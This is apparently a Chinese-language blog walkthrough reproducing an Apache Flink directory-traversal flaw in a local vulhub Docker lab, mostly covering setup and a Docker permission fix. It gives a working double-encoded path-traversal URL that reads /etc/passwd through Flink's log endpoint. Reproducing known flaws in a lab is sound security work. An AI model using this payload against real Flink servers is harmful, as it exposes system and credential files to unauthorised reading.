apache flink目录遍历漏洞（CVE-2020-17518复现）

漏洞描述：

apache Flink目录遍历漏洞，可通过REST API读/写远程文件

影响版本：

Flink 1.5.1-1.11.2

接下来开始复现：

我们通过vulhub进行复现

打开vulhub上的flink里的cve-2020-17518

使用docker-compose配置相关环境:(在靶场cve-2020-17518使用下面的指令）

docker-compose up -d

sudo docker-compose up -d

然后输入kali密码即可成功启动环境

接下来我们查看当前环境：

在靶场终端输入：

docker ps

但是在我的kali2022上面出现了报错：

Got permission denied while trying to connect to the Docker daemon socket...

8行，和上一篇文章出现了一样的问题，上网搜索解决

先放大佬博客，里面有讲原理，简单说就是我们要用sudo获取root权限才行

[Linux] docker 出现Got permission denied while trying to connect to the Docker daemon socket...问题的解决办法_Cloudeeeee的博客-CSDN博客

1.

sudo groupadd docker

2.

sudo gpasswd -a $USER docker

3.

newgrp docker

4.

docker images

即可成功解决问题

解决后可以看到端口是8081

接下来我们浏览器访问

http://127.0.0.1:8081/

构造exp： 

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

可以看到成功复现，出现了root

最后一步： 清理环境

docker-compose down

done

成功清理靶场